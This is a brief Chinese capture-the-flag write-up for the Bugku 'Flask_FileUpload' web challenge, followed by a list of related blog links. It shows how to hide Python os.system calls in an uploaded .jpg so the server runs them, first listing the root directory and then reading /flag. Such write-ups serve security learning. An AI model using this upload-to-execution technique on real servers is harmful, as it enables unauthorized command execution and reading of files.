Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
拓云者也几秒前
常用的生物信息学数据库以及处理工具
数据库·python·oracle·r语言·bash
SunnyRivers2 分钟前
Python 的下一代 HTTP 客户端 HTTPX 特性详解
python·httpx
hcnaisd23 分钟前
机器学习模型部署:将模型转化为Web API
jvm·数据库·python
m0_738120725 分钟前
内网横向——记录某三层网络渗透及综合渗透(socks代理隧道搭建,nacos未授权,redis上传Webshell)
网络·安全·web安全·ssh·php
果粒蹬i7 分钟前
Python + AI:打造你的智能害虫识别助手
开发语言·人工智能·python
红色的小鳄鱼8 分钟前
Vue 教程 自定义指令 + 生命周期全解析
开发语言·前端·javascript·vue.js·前端框架·html
阿钱真强道8 分钟前
09 jetlinks-mqtt-属性主动上报-windows-python-实现
开发语言·windows·python·网络协议
Blossom.1188 分钟前
从单点工具到智能流水线:企业级多智能体AI开发工作流架构实战
人工智能·笔记·python·深度学习·神经网络·架构·whisper
亚林瓜子9 分钟前
pyspark添加一列时间戳数据并改名
python·spark
coloma201210 分钟前
COCOS代码动态增加刚体和碰撞体的方法
前端·uv
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书05UV安装并设置国内源062026美赛A题智能手机电池续航时间预测的连续时间数学模型07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册102025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望